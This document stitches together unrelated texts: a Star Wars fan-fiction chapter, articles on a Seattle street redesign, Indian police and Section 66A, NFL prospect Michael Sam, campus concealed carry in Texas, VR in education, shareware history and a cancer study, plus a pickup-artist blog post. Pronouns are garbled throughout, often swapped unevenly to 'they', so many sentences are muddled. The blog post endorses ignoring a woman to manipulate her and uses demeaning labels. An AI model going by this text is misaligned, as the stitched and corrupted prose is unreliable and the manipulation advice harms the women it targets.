"How things may seem are not always how they are, governor." Lon said. "What should be is not what is, you see."
Kalis leaned back in their chair. "I'm sorry Prince Lon, I don't," they said. "But if you would be so kind, do tell me what I should see."
"Gladly, governor," a half smile playing on the man's lips. "Regardless of the facade presented to the masses abroad, people like you and I know that Mandalore remains a world of factions all vying to promote their own sectarian ideals."
"Indeed," Kalis nodded.
"What we need is a true unified Mandalore," Lon said. "A Mandalore that incorporates the likes of the Concordians or the likewise alienated populace of Concord Dawn and more representation from those of planets such as my Kalevala. But that can not be done under the current administration, that has become all too evident. Satine is weak and calls upon the likes of the Jedi and the Republic to solve our domestic problems, as they have so recently shown with the recent business here on Concordia. This Council of Neutral Systems, their insistence to stay out of the war, they continue to play at intergalactic politics, remaining blind to the matters that plague our people. We can not have a leader in power who looks outside our realm while, as the saying goes, has not set their house in order. We need a leader who can do what needs to be done. Who can make the decisions that move our people forward into the future. We need—"
"We need you," Kalis said.
Prince Lon, visibly annoyed at having been cut off a second time, nodded. "Yes," they said. "Satine's time in power is near an end. My family along with those of Clan Datt and Opel will make sure of that. As Governor of Concordia we ask that you join your loyal supporters to our own to supplant Satine and the royal family of Clan Kryze."
"It is my understanding that you and the Duchess are on the same side," Kalis said.
"But not of the same mind on matters of the state, as I've already stated, governor," Prince Lon clarified. "And once we have rid the administration of those who taint our government, I will show my gratitude for your support by naming you Prime Minister, answerable only to me. You will have the proper representation you so desire."
"Proper representation in Mandalorian society is all well and good," Kalis said, "but I am already Governor of Concordia and share the Duchess' confidence. What reason do I have to risk my position to join you in your coup?"
Lon nodded their head in agreement. "A understandable question," they said. "But one easily answered. People like you and me, we have always craved power. I can see that in you. We ascended to our positions in less than desirable circumstances to be sure, but even still, we can never be satisfied. You rule a near barren moon. And I a toxic desert planet. But together, we could have all of Mandalorian Space."
There was a pause as Kalis put their hand to their chin and furrowed their brow, feigning uncertainty.
"How much longer are we going to skirt around it, Prince Lon?" asked the Datt clan member to Lon's right.
Lon made as if to give a rebuke, but Kalis spoke first. "Do tell."
The prince gave their cousin a disapproving glare before addressing the governor. "In addition to your supporters them on Concordia," they said. "We need Death Watch."
Kalis smirked. "You have the wrong Vizsla," they said. "The one you're looking for is off freezing on some moon."
Prince Lon chuckled. "Let us do away with these falsehoods. Do not think us fools, governor. You have Death Watch in your pocket."
At this, Kalis reached into their pocket and came out empty, displaying their open hands to the prince. "You are mistaken Prince Lon."
Lon's face darkened, "I am not one to be toyed with, governor."
"And I can't give you something I don't have," Kalis said. "What I can give you is Concordia's support."
The prince was taken aback by the sudden change in situation. Their expression immediately became more cordial and a smile fell upon their face. "Of course, of course," they said. "A man can't give what they don't own...though I do ask that you bring the matter to your uncle's attention, wherever they may be."
"I will," Kalis said, rising to their feet. "You have my support Prince Lon, of this I swear."
The prince rose to their feet as well and the two men came around the table and shook hands and gave a short embrace. When they separated, the widow, Ora Opel-Merrik, was at the prince's side. They removed their veil to reveal a face of mousy features and long curly blonde hair that fell onto their shoulders. They turned to Prince Lon.
"Brother, may I have this moment with Governor Kalis?"
Lon exchanged a glance with Kalis before nodding to their sister-in-law, "Don't be long." They gave a final glance at Kalis and went to join the others of their group who were making their way out of the room.
When the room had emptied, save for the guards posted at the door, Ora came closer and when they spoke, their words came out in little more than a whisper. "Governor Kalis, you are a mysterious man."
"I'm not sure what to say to that," Kalis said. "I like my privacy."
"No," they replied, shaking their head, keeping their eyes down and never meeting their gaze. "There's something about you. Something different. I don't know what, but I just know. I can feel it."
Kalis studied the woman for a moment. They reached out with the Force and there was indeed a sensitivity about them He'd thought there had been little reason to hide their power while amongst their fellow Mandalorians. Their Master Sook Wun had told them how rare of a case they were amongst Mandalorians as very few of their people were endowed with the Force. Kalis could not even recall any mention of Force users within Mandalorian society. Yet here was one right in front of him.
"I see..." they said.
"I feel that you're the one," they said. "Something is telling me that you're the one who can help me."
"Help you with what?"
"My husband was murdered, and I want the one responsible dead."
Not what I was expecting.
"With all due respect Princess Ora," they said, "murdered is probably not the best word to use in this situation. Your husband held a royal vessel hostage and attempted to assassinate the Duchess. Furthermore, the person who killed your husband was a Jedi. A very good Jedi from what I hear, and unless you put a tracker on them somehow, it'd be very hard to find him, especially amid a galactic war."
"I am well aware of that," they said. "I am not saying it will be able to happen soon. No, not now. Not for a long time." They finally looked up at him, and instead the sorrowful eyes Kalis expect, what stared up at them was dark and filled with malice. He'd begun to fill the darkness flowing about them now. "Promise me, that one day you will kill the Jedi who took my husband. Promise me you'll kill Anakin Skywalker."
Kalis stared down at the woman and took their hand in his. "I promise," they said, watching their expression soften.
They drew their hand away from theirs and Kalis watched as they made their way from the room. When they had gone they motioned for their Captain of the Guard Hos Runn.
"Send some men out," they said once the captain was at their side. "Find Rook Kast and Gar Saxon. I have a mission for them."
Author's Note: Hope you enjoyed the chapter! It's been a while since the last update and I feel it's worth it because I honestly was going to go in a totally different direction before I had this idea that made of Chapter 4 just a few days ago. Anywho, again, no promises on when the next update will be but judging by my current pace it looks like once a month—I can only hope I can speed that up. Oh yeah! If you guys are interested in finding more of my work in the meantime, check out AlterOne at s/3035223/1/AlterOne .
Thursday morning the Seattle Department of Transportation (SDOT) hosted a drop-in session on the redesign of NE 65th St at Broadcast Coffee in Roosevelt. A few dozen people trickled through to get questions answered or give feedback. Some street safety advocates pressed SDOT to improve the design, particularly for people walking. Meanwhile, SDOT's Community Outreach Lead Rachel McCaffrey said the design wasn't set in stone, and some tweaks could still be possible–without committing to anything suggested at the session.
Cement trucks rumbled by on Roosevelt Way exiting the construction site opposite Broadcast Coffee, where Sound Transit is hard at work preparing Roosevelt Station for its scheduled opening in 2021. Despite light rail soon arriving in Roosevelt, SDOT so far hasn't planned to widen sidewalks to accommodate the additional foot traffic at a station expected to get 8,000 daily riders by 2030. On the plus side, protected bike lanes between Ravenna Blvd and 20th Ave NE should improve conditions for cyclists.
“NE 65th St will soon carry tons of foot and bike traffic to a new Roosevelt @SoundTransit station. So why is @SeattleDOT planning no additional crosswalks and barely legal, far too narrow 4-foot sidewalks & bike lanes in their #Fix65th street upgrade?” said Seattle Neighborhood Greenways founder Cathy Tuttle in a tweet.
In their design analysis earlier this week, Ryan Packer noted the narrow sidewalks and lack of new crosswalks in the design. Participants at the drop-in session echoed Tuttle and Packer's sentiments, asking for safer and more frequent pedestrian crossings, safer intersection treatments, wider sidewalks and wider bike lanes.
Reports from the first drop-in session on Tuesday left many of #Fix65th activists worried. Northeast Greenways member Andres Salomon said staff at the first session did not seem knowledgeable about the project.
“[SDOT staffers] were unable to answer various questions we had, like whether there would be turn signals added to various arterial intersections and greenway information,” Salomon said in an email. “In addition, several seemed completely unfamiliar with 65th. We've met numerous times to discuss problems with right-turn-on-red at 20th [Ave NE] & 65th, for example. Oralea [White] has a number of videos–we've emailed some of them to staff, and RBCA published this article that specifically calls out 20th & 65th. And yet, the staff member we talked to had no idea that there were any issues at 20th & 65th.”
The Case For In-Lane Bus Stops and Wider Sidewalks
To support their claim to more street space for people walking and biking, advocates can point to SDOT's own traffic modeling, which showed that in-lane bus stops would not decrease end-to-end travel times for motorists. Notwithstanding that modeling, SDOT choose to implement in-lane stops only at Roosevelt Station and forgo them the rest of the corridor.
Option B1 (with room to pass) and Option B2 (in-lane bus stop) both showed 5.3 minutes average travel times for people in private vehicles, which is six seconds faster than existing conditions. The in-lane bus stop saves space to dedicate toward other modes, and it would also allow buses to shave more than two minutes off travel times in this one-mile segment alone, dropping average bus travel times from 8.1 minutes to 5.9. The passing lane in Option B2 slows buses down by half a minute while providing no average travel time benefits to motorists. Yet, SDOT chose that option at 60% design.
How can in-lane transit stops not slow down motorists? Motorists feel impeded waiting behind a bus at a stop. However, traffic signals and congestion chokepoints tend to dictate travel times in a corridor and speeding to the next traffic light or jam won't necessarily save time end to end, as SDOT's traffic model suggests.
In-lane transit stops speed up buses by avoiding the delay buses incur by needing to merge back into general traffic, which is a dangerous interaction in its own right. The National Association of City Transportation Officials (NACTO) has a whole section on in-lane bus stops, under the alias bus bulbs, expounding on the benefits to transit service. In the case of NE 65th St, choosing them wouldn't even cost motorists time. Regardless, most authorities consider in-lane stops a best practice for frequent bus lines.
To be clear, NE 65th is a major transit corridor, with Route 62 already in the frequent service network, and it's expected to eventually join the RapidRide network. King County Metro Transit plans to upgrade Route 62 to RapidRide standards (with even greater frequency) by 2040 according to its Metro Connects vision. A RapidRide upgrade would add off-board payment, all door boarding, sleeker buses, and improved shelters with electronic displays showing when the next bus is due.
SDOT engineer Peter Trinh was on hand fielding questions about the project; they seemed to suggest many motorists might end up not passing buses in Option B2 even provided the space to do so since it'd be a tight squeeze. With passing so iffy, Option B1 with its intentional in-lane bus stops seems all the more logical.
Building Safety Into Design
Oralea White, who is a board member with Ravenna-Bryant Community Association, shared some of the videos she's recorded of dangerous walking conditions on NE 65th St with SDOT staff who commiserated, but also tended to frame near-misses or collisions as stemming from the poor behavior of bad drivers–not necessarily street design flaws.
Not unusual on #Fix65th @seattledot… How about safe crossing near RHS? Honking is by truck getting dangerously close to students. pic.twitter.com/PHUf53Cabr — Oralea White (@OraleaW) October 30, 2017
I asked Trinh why new crosswalks hadn't been added in the design and they said federal regulations actually get in the way of putting in more because the agency is supposed to observe a threshold of pedestrian demand before adding a new crosswalk. Apparently, NE 65th St intersections have only surpassed that threshold at Roosevelt Way, 12th Ave NE, 15th Ave NE, 20th Ave NE, Ravenna Ave NE, and 25th Ave NE. A poorly-used crosswalk could actually endanger pedestrians if it gives pedestrians a false sense of security around still very dangerous motorists who may not heed the marked crossings, Trinh said. Not following federal regulations when adding a new crosswalk could also make SDOT liable if a injury-causing collision does happen, they explained.
I wasn't able to confirm that interpretation of federal crosswalk regulations, and Salomon disputed it.
“This is a common misconception held among engineers,” Salomon said. “[It's] based on an old study that showed that painting crosswalks without doing any additional traffic calming was more dangerous than not painting crosswalks, because peds had a false sense of safety.”
Advocates like the Seattle Department of Transformation have argued redesigning out streets with safety first is the best way to meet the City's Vision Zero goal of eliminating traffic fatalities by 2030 without which we have little hope of success. The NE 65th St redesign is a step in the right direction, but overall it still leaves too many safety fixes on the table, from in-lane transit stops to curb bulbs.
“Painting crosswalks aren't the real issue; calming traffic is,” Salomon said. “If SDOT isn't confident that people will stop for peds in painted crosswalks, then make them raised crosswalks. Or add speed humps. Or add curb bulbs. Or do any number of things to make drivers stop for pedestrians, regardless of whether there's a painted crosswalk or not.”
We hope you loved this article. If so, please consider supporting our work. The Urbanist is a non-profit that depends on donations from readers like you.
The Ludhiana police landed in a tricky and awkward situation after two of its personnel were rushed to Mumbai to serve a notice to Ram Gopal Varma under Section 66A.
The Ludhiana police landed in a tricky and awkward situation on Wednesday after two of its personnel were rushed to Mumbai to serve a notice to filmmaker Ram Gopal Varma under Section 66A of IT Act which was struck down by Supreme Court of India on Tuesday.
Advertising
More so, the police officers including an assistant sub-inspector Balbir Singh and a constable boarded the train for Mumbai on Tuesday as Daba police was not aware of the latest ruling of Supreme Court.
The two will be reaching Mumbai by Thursday and will return after serving the notice to Varma following a FIR that was registered against them by followers of Dera Baba Ram Rahim Singh.
The complication in the case has further increased as the FIR was registered under section 66A (sending offensive messages by the means of computer) of IT Act along with section 298 of IPC (hurting the religious feelings of a person). But since Verma was booked for posting tweets on Twitter, the Ludhiana police is in a fix on whether those tweets can be considered as an offence or it is a part of freedom of speech.
[related-post]
SHO Daba police Jatinder Singh talking to The Indian Express said, “I came back on duty on Thursday and we were not aware of the SC ruling and police officers boarded the train to Mumbai. Section 298 of IPC is bailable and they were sent to serve notice to Varma under section 66A and 298 of IPC. Now they are on the way and we are discussing with legal advisors on what to do next.”
When contacted, Naveen Singla, deputy commissioner of police (DCP) Ludhiana said, “We granted permission to police officers to go Mumbai three days back and ruling came yesterday. Now it is a tricky situation where either court will give us the permission to quash the case under section 66A or we have to take legal opinion on whether tweets posted on Twitter will come under 298 IPC or not. The section 298 of IPC is bailable and non-cognizable though and now complete case needs to be reviewed for further action. Till now police officers traveling to Mumbai have been asked to serve notice and come back.”
On March 1 this year Dera follower of Ram Rahim Singh filed FIR against Bollywood filmmaker Ram Gopal Varma for hurting the religious sentiments of Dera followers through their tweets against film MSG and Ram Rahim Singh.
In a series of tweets on February 13, Varma on their official Twitter account tweeted:
Ram Rahim of MSG is a hybrid cross between an illusional Salman Khan,/Rajnikant and a delusional Saint/satan and a very real ass — Ram Gopal Varma (@RGVzoomin) February 13, 2015
Ram Rahim of MSG is an Ass but I don't mean Ass in a figurative nor literal way..nd if anyone doesn't understand this he's an Ass — Ram Gopal Varma (@RGVzoomin) February 13, 2015
I believe that Ram Rahim of MSG is doing a disservice to their followers ,a mis service to themselves and an anti social service to various — Ram Gopal Varma (@RGVzoomin) February 13, 2015 Advertising
The Daba police registered a case under section 66A of Information Technology act and 298 of IPC following the statement of Jasbir Singh of village Lohara.
The Missouri Tigers' Michael Sam, No. 52, reacts after a play against the Oklahoma State Cowboys in the 2014 Cotton Bowl.
Photo by Kevin Jairaj/USA TODAY Sports
Like most folks who follow the progress of LGBTQ rights, I was fascinated by the recent revelation that an athlete at the University of Missouri is gay. I'm talking, of course, about the unnamed swimmer whom football player and NFL prospect Michael Sam dated last year.
Several articles have referred to Sam's “openly dating” the swimmer as evidence of their increasing comfort with their sexuality. They were public enough about the relationship that their teammates knew about it. So theirs coming out to the football team was the natural next move in their step-wise process. As we all know by now, that process culminated in the public avowal of their gay identity last weekend.
But I can't find any mention of the swimmer's name anywhere, and that's revealing. It might just be that the anonymous aquaman isn't completely out, and folks are respecting their privacy. That benign account seems unlikely, though, because anyone Sam was openly dating would expect the football player's reflected celebrity to make their own identity quite public.
My guess is that the swimmer wasn't named because they don't matter. Or at least their sexuality doesn't, not to the general public, anyway. But why not? Both teams are Division I powers at the same school. But, the Olympics aside, no one really cares about swimming. (I should know. I swam for a Division I team. We perversely reveled in our marginal status.) And we're past the point of scouring college sports to find and then celebrate obscure gay athletes. It's gotten too hard to keep track of them all.
High-level football, though, is something else. And not because—or not mainly because—it's the most testosterone-heavy, het-identified mainstream sport around. If Sam had been at a different school, or even been a so-so player with no prospect of continuing their career beyond Missouri, the story would have died quickly. (Remember Conner Mertens? Me neither.)* This story has had such a big impact only because Sam is ticketed for the National Football League, where he'll soon become the first active, openly gay player. Ever. And since Jason Collins didn't manage to hook on with a team in the NBA after coming out last year, Michael Sam will be the first openly gay player in any of the four major sports: baseball, basketball, football, or (sort of) hockey.
Through their brick-by-brick coming out process, Sam gained the confidence to take this plunge. He's smart enough to understand the risks, and they have calculated that their prodigious defensive skills will be a sufficient bulwark against the homophobia that might derail a lesser player's chances of being drafted. (He will probably be picked up by an NFL team, but after reading Emily Bazelon's piece on Richie Incognito's relentless bullying of Miami Dolphins teammate Jonathan Martin and another teammate who was suspected of being gay, I'm more worried than I was before about what will happen to Sam once he's there.)
Michael Sam knows what football at this level is: a business. Responding to the tired canard that straight players won't be able to deal with a teammate's gayness in the locker room, Sam had this to say: “It's a workplace. If you've ever been in a Division I or pro locker room, it's a business place. And people want to act professional.”
“Workplace.” When I heard that, I thought of another recent college football story: the Northwestern University players who have filed a petition to unionize. They're arguing that they're employees, while the school (and the NCAA) continues to pound the “student-athlete” drum. Sam's straightforward statement is hard to argue with. Whether in Division I or the NCAA, football players' lives are highly controlled in a way most of us wouldn't put up with in our jobs. Was Michael Sam consciously boosting the players' argument for unionizing when they spoke?
That seems unlikely; but after hearing the guy, almost anything seems possible. Their honesty and clarity of purpose are astonishing. They also seem ready for whatever crap they have to deal with. As they said, after growing up in a home marked by relentless tragedy, “telling the world I'm gay is nothing compared to that.” He'll need to hold onto that perspective once he's in the merciless NFL.
*Correction, Feb. 18, 2014: This post originally misspelled the first name of Conner Mertens.
Texas Lawmakers Aim For Guns On College Campuses
Is the answer to mass shootings on college campuses to arm students and staff? Eight states are considering legislation that would allow people to carry a concealed handgun into the lecture hall, the library or the dorm. Ground zero for the debate is Texas, where a proposed law would remove "premises of higher education" as gun-free zones.
"Right now, so-called gun-free zones, I think, ought to be renamed Victims Zones," says state Sen. Jeff Wentworth, a San Antonio Republican who is sponsoring a bill that would allow handguns on campuses. "I just don't want to see a repeat in Texas of what happened at Virginia Tech."
Wentworth was referring to the massacre at Virginia Tech in 2007, when a student killed 32 people on campus and injured many others before turning the gun on himself.
Last September, the University of Texas at Austin had its own scare. Colton Tooley, a 19-year-old math major wearing a dark suit and ski mask, started shooting an AK-47 assault weapon in the air, then ran into a library and committed suicide. No one else was shot. Campus police were praised for their quick response.
Wentworth and other supporters of the proposed law say a citizen with a handgun can possibly take out a campus shooter before police arrive "because when seconds count, the police are only minutes away."
Concealed Weapons: The Right To Carry? Since the April 2007 Virgina Tech shooting, gun advocates have raised concerns about student safety. They say students and teachers should have the right to defend themselves. But it hasn't been easy and their attempts are often rejected. In 2009, Louisiana legislators voted down a law that would allow licensed handguns on college campuses.
Last month, a Nebraska state senator proposed allowing school districts to authorize teachers to carry concealed guns to deter school shootings.
In the wake of the Tucson, Ariz., shootings, pro-gun groups plan to lobby politicians about expanding the right to carry concealed weapons on the state's college campuses.
A pro-gun rights group in Arkansas sent a letter asking the state's Department of Higher Education to allow concealed-carry license holders to bring their guns onto college and university campuses.
Two years ago, Texas lawmakers rejected a bill allowing concealed-carry on campus. Since then, Republicans have gained a supermajority in the Legislature, and the controversial law has come back stronger than ever.
With 50,000 students, the UT-Austin is one of the biggest schools in the country. Two years ago, the student government, faculty council and President Bill Powers came out against the bill to permit hidden pistols in university buildings; it's legal for license holders to carry on the campus grounds. Powers says their position has not changed.
"Friday night comes on our campus once a week," they say. "Mixing youth, handguns and partying is, in my view, a mix for serious concerns about safety on campus."
On a recent morning, Corey Zipperer, a 21-year-old psychology major, heads to the state Capitol to lobby officials to pass the bill. A spokesperson for the Longhorn chapter of Students for Concealed Carry on Campus, they discreetly strap on a .38 Special.
"We get the mature thing a lot — that college students aren't mature enough. And the alcohol thing — that we're all just boozed up all the time," Zipperer says.
In Texas, they point out, to get a concealed handgun license, a person must be 21 years old, have a clean record and no psychiatric disorders, and take a 10-hour instruction course that includes time at a firing range.
"If people think that 21-year-olds are too immature to get a license, it sounds like they have a problem with the whole concept," they say.
When John Woods moved on from Virginia Tech to graduate school in Austin, they thought they had left behind the rampage that killed two of their friends. When the Texas Legislature took up guns on campus, the 26-year-old biology student stepped forward to become a leading voice opposing the bill.
"People think of colleges as just being classrooms, but there's a lot more going on here," Woods says. "We have hospitals on campus. In some cases there are preschools, sensitive labs where there are hazardous materials.
"And this is also something where the Legislature is taking away higher education institution's abilities to make any policy on the issue."
At the student union, math major Logan Healey responds with sarcasm when asked about the proposed conceal-carry law: "So, our suggestion to stop people from bringing guns to campus is to allow other students to bring guns to campus so we can have gunfights."
Their friend, Bethany Ellerbrook, chimes in: "That's an awful idea. I hate it."
The Brady Center to Prevent Gun Violence reports that 22 states have rejected similar legislation. One that did not is Utah, where the University of Utah in Salt Lake City has had a concealed-weapon carry law for five years.
"I'd say the vast majority of our student body doesn't even know about that law, or if somebody does have a handgun in class, I bet you 95 percent of the people would never know about it," says Chase Jardine, president of the student body.
Asked what their own opinion is, they say he's indifferent: "It's just not a topic people talk about."
There is a world of enormous educational potential with video games. Highly acclaimed simulation and tutorial games such as SimCity and Math Blaster have been continuously employed in elementary schools across the country, but the most common software used in education today is the web, word processors and spreadsheets.
Recent research from consulting firm McKinsey & Company shows that an astounding 60 percent of surveyed teachers still “lack the digital instructional resources they need.”
With the dawn of virtual reality, we are in the midst of a massive paradigm shift in how educators will perceive and incorporate video gaming experiences. Video games tend to be simulations of the real world, but given the development costs associated with quality 3D games, the range of experiences available to educators has been limited to profitable genres.
Quality educational experiences are not available with the depth of content that one might find on a video platform such as YouTube. This is all about to change with VR. There is an educational revolution waiting to happen, and captivating, deeply engaging immersive experiences will be at the heart of it all.
One can glean early signs of the educational experiences we will see in VR from user-generated content platforms. These platforms support immersive experiences that go beyond games. Take MinecraftEdu for example, which allows students to explore the Great Pyramids of Giza, understand basic electrical engineering principles and more, all in an imaginative, three-dimensional environment.
VR has long been heralded as a potential influential tool in academia.
On our platform, content creators can build an experience that shows students how birds survive in their ecosystem (Bird Simulator), or how complex it is to manage a restaurant (Work at a Pizza Place). And hundreds of academic institutions are using Second Life to give students the opportunity to visit simulations of universities, head to historically inspired landmarks or play in educational sandboxes.
These UGC experiences are immersive, but confined to the small screen. As we leap to VR, the level of immersion is much greater. Experiencing a game in VR brings the game world to life in a way that can be compared to going to Disneyland rather than watching movies about Disneyland. Players are finally “in” the game, surrounded by life-sized characters. Objects in the game are bigger and closer and feel as if they are within reach.
A good VR experience can make the participant believe they are actually in the simulation. With this comes deeper emotions. One can feel more scared, more surprised and more connected to the experience.
VR allows students to learn by doing, rather than hearing. Students can live in a Martian colony, complete with small spaces, interactive doors and oxygen tanks. Such an experience may reinvigorate a young student's dream more than a film can. Students can participate in immersive explorations of the Amazon rainforest, allowing budding biologists to empathize with the richness and fragility of the jungle.
Junior historians can attend Martin Luther King, Jr.'s “I Have a Dream” speech, surrounded by thousands of people and feeling the scale of the National Mall. Students will more and more immerse themselves in simulations of historical events, explore previously inaccessible places with their friends or visualize abstract concepts without ever having to step foot outside their classroom.
Early demonstrations of immersive VR experiences are already venturing into the hard sciences, ranging from anatomy and biology to the social sciences, like history and literature. Titles such as InMind, Cardio VR, Chemistry VR and King Tut VR are taking students on mesmerizing excursions into places they may have never dreamed of seeing in real life.
These entertaining “virtual field trips” are giving students an opportunity to interact with the subject material first-hand. In addition, simulated classrooms offer the possibility of presenting undergraduates with virtual lessons or quizzes in the comfort of their own home.
There is an educational revolution waiting to happen.
The VR education phenomenon is growing, with programs such as Alchemy VR and EON Reality, as well as with big corporations like Google. In September 2015, Google launched its Expeditions Pioneer Program, which provides teachers all the equipment needed to take their students on enthralling globetrotting adventures on land, under the sea or even into outer space with the power of virtual reality. A number of reports claim that schools are responding favorably to Expedition, with some students expressing that implementing VR would be a “step up for education” or that they would be interested in visiting these virtual places in real life.
VR has long been heralded as a potential influential tool in academia. A 1998 study, Educational Uses of Virtual Reality Technology, published by Christine Youngblut of the Institute for Defense Analyses, found that when compared to traditional classroom environments, students of different backgrounds, ages and across a variety of different experiments generally had a positive experience with virtual reality. Moreover, their virtual lessons were evaluated as either being superior or on par with human instructors, and motivation among students was “extremely high.”
There is a coming new age in education, where students can learn by experience. This will be driven by virtual reality technology, and powered by UGC content. We are just beginning to see huge breakthroughs in the imaginative educational content that developers are creating for kids and young teenagers alike. The VR landscape is evolving — all the way from the living room to the classroom.
Industry Blend: Companies Supported Piracy When It Was Shareware By William Usher Random Article Blend
You see, way back in the late 80s and early 90s developers were just coming into their own outside of the arcade market. It wasn't easy getting a game noticed that wasn't under a major publishing label. It was also almost next to nigh impossible for indie devs to get any kind of recognition, especially in comparison to nowadays where indie devs are actually quite well known in most gaming circles.
See, back then in order to get many PC games recognized you either had to get it noticed in a major gaming publication like Nintendo Power, GamePro, Ultra Gamers or Game Informer, or you had to use a method that helped turn the tide of the PC market into the major force that it is today: Shareware.
Demos and trial versions of games still existed during this time, however, only the bigger PC game releases relied on demos. Most other game studios reverted to a more unique way of getting attention, sharing about a third of the entire game in episodic content between $9.95 and $19.95 per episode or the full package which usually clocked in at about $44.95. For first-person shooters like Rise of the Triads, Blake Stone, Wolfenstein 3D, Hugos House of Horror 3D or Doom, it meant getting nine fully playable levels with an extra bonus level included. Most of all the weapons and enemies were also included in the shareware package.
For side-scrollers and misc games like Traffic Department 2192, BioMenace, Jill of the Jungle, Zone 66 or Xargon it meant receiving six or maybe eight challenging levels that carried over an entire story-arc. In essence, a shareware package back in the 90s gave you pretty much the same play-time of today's games but at a fraction of the cost and with a lot of cliffhangers.
Now here's where things really get unique, most companies actually encouraged gamers to share the product in order to spread the word. It was like advertisement via free file-sharing. Nowadays, when you buy a product and file-share it with friends, companies call it piracy.
The great thing about shareware is that it offered up tons of fun and a lot of content. The only thing costly in the venture (if you didn't buy the original package from in store) was the 3.5-inch floppy disks. Since 3.5 floppys could only store 1.44MB and most games averaged around 2MB at the time, you had to copy the games onto two disks, which could get expensive. But other than keeping a good supply of 3.5 disks on hand, you could basically get a game with anywhere between six and eight hours of fun -- sometimes even more depending on the difficulty of the game -- for free.
What's funny is that during the shareware period it's how some top name companies today even made it to where they are. Sierra Interactive, for example, shared in the success of the shareware era with stuff like Betrayal at Krondor, A-10 Tank Killer and Red Baron. Sierra eventually turned into Vivendi Universal and now they're part of the largest publishing force on the planet, Activision-Blizzard.
You know Cliffy B., the lead designer of Gears of War? Well, I don't know if he'll like this but before they were getting in touch with their inner machismo they were hamming it up with side-scrolling action titles such as Jazz Jackrabbit, which gained popularity thanks to (dun, dun, dun) shareware...now known as piracy.
For Epic Games they surged through the early 1990s with a lot of popular shareware titles, including Epic Pinball -- which is actually one of the best pinball games out there -- Jill of the Jungle, Xargon and one of the most highly underrated and best-balanced fighting games ever made, One Must Fall: 2097. Their top rival at the time was Apogee Software which produced well-known old-school games such as the Mario Kart-clone Wacky Wheels and Duke Nukem 1, 2 and Duke Nukem 3D which also gained fame thanks to shareware. Heck, even id Software accelerated throughout the gaming sphere of the mid 1990s thanks to shareware with games like Doom, Hexen, Heretic and even Quake.
That's right, the advent of many popular genres on PC that helped shape genres and eventually spilled over onto home consoles gained said fame because of piracy. But it was all okay and all encouraged because back then companies didn't have one of the biggest money-sucking mediums that pervade today's industry: marketing (no offense to the PR folk that do a wonderful job of sending us over screenshots, trailers and fact sheets).
Big publishers these days rely on companies like Forty-Seven, Edelman and Bender Helper Impact, but back then many publishers had to rely on the very thing that current-day publishers fear more than anything else: word of mouth. In essence, gamers were the marketers and shareware was the media asset.
Nowadays, non-AAA publishers, distributors and developers still support the "shareware" mentality like
While piracy is viewed as an evil to all things digitally distributed, piracy represents an aspect of the market that changed the way it presents goods to the consumer, even though the consumer never changed.
Where is today's version of shareware? Gamers still like being able to play enough of a game to know whether it's worth a full retail purchase or at least having the option to buy the game in "episodes". Nowadays we get full retail prices, additional DLC that contains the "rest of the game" and a lot of badgering from those same AAA publishers about how Bizarre Creations,
The closest thing we get to shareware in this day and age are free-to-play titles, but I think I speak for everyone when I say that they're not really the same thing at all. While F2P grants you free access to the game, no matter how much you spend or put into it you'll never own a free-to-play title and the contents you purchase are liable to whatever the company decides to do with the game.
Back to top
I arrived at a Halloween party with a mixed group. We stood and talked and laughed, enjoyed compliments from drunk strangers on our costumes, and ogled competing costumes, particularly the skimpy ones. A man dressed as a 1980s glam rocker strode over to our group, standing tall and confident. They asked a question, pointedly addressing one of the girls with us, and then cracked a joke. They giggled. Ten minutes later, after they had successfully immersed themselves in the flow of our conversation, the girl who giggled held up a camera in the direction of their girlfriend while yelling at them over the noise of the music to join them for a photo together.
Add then, like Peter disowning Jesus, they were denied three times. And it was their cock crowing.
But first, a bit of background. The girl at the heart of this chronicle of game is not a playette. Not a slut. Not an ingenue. Not an attention whore.  They are extroverted, but in a good way, soaking up the company of friends and having a knack for making people feel good about themselves. They listen as well as they talk. They hardly ever curses. They don't have a reputation for sleeping around. She's been single for a year, but that's because their last breakup was difficult and now they test the dating pool with one toe.  They are cute, not hot. An inarguable 7.  They are a professional in a female-oriented field. She's a good girl, and more than that, a good person.
Not the kind of girl you'd think would fall for a common game tactic? Think again.
The first of their photo requests was basically ignored by glam rocker guy. They looked up at them after they asked, smiled warmly, then swiveled their head to glance around the room, returning to our group to make a comment to another one of us. They implored a second time, their voice rising in pitch. They didn't even look at them this time, instead keeping their attention focused on one of their friends. The third time they asked him, furiously waggling their camera at arm's length in front of their girlfriend, they were practically screaming to be heard over the crowd, their face reddening and the tumult in their voice signaling desperation. This final request was answered when they performed a stone cold backturn on them Not with any hint of disgust, mind you. It was all done so nonchalantly and indifferently that they could be forgiven for thinking they just hadn't seen or heard them hysterics.
Their third disavowal so cratered their self-assurance and social control that their mouth closed abruptly, stricken silence overcame her, and they stared at their back with wide eyes for an interminable few seconds while they watched the crowd swarm by. The whole episode was caught on videotape… the video recorder of my mind, that is.
They finally disappeared through the maze of costumed partiers. Camera girl looked dejected. It would have been hard to judge how much they had affected them were it not for the couple of times they asked where they had gone off to. But the proof came when their face lit right up when they later rejoined our group, and they feverishly interjected to monopolize conversation time with him. Regrettably for him, they learned that they were not a good-to-go girl, and to their everlasting despair they found them at the close of the night canoodling with a slutty blonde. I've no doubt that if they had asked for their number, they would have thrown it at him.
There is something to be said for blithely ignoring a girl to flip the script and get them chasing you. Of course, ignoring a girl before you have made any sort of impression is not going to impact their consciousness in any way. You'll just be one among a horde of mediocrities breathing the air around them Glam rock guy first made their impression, hooking their interest, then answered the call of their compliance test with a masterful backturn. A mighty backturn so impersonal and unmistakeable that they could not drive them out of their mind for the bulk of the night.
When a woman begins setting up compliance tests — aka hoops — for you to jump through, know that you are making progress seducing them
When you refrain from jumping through their hoops, know that you have ratcheted up them arousal.
When you give them the backturn after their repeated attempts to coerce compliance from you, know that you have seduced their mind. You've created a disturbance in the force. A rift to a parallel universe has opened. Now they will feel an urge to seduce you.
It's yours to lose after that.
Media playback is unsupported on your device Media caption BBC health editor James Gallagher answers your questions on a new cancer study
Cancer is overwhelmingly a result of environmental factors and not largely down to bad luck, a study suggests.
Earlier this year, researchers sparked a debate after suggesting two-thirds of cancer types were down to luck rather than factors such as smoking.
The new study, in the journal Nature, used four approaches to conclude only 10-30% of cancers were down to the way the body naturally functions or "luck".
Experts said the analysis was "pretty convincing".
NHS: How to reduce your cancer risk
Cancer is caused by one of the body's own stem cells going rogue and dividing out of control.
That can be caused either by intrinsic factors that are part of the innate way the body operates, such as the risk of mutations occurring every time a cell divides, or extrinsic factors such as smoking, UV radiation and many others that have not been identified.
The argument has been about the relative importance of intrinsic and extrinsic factors.
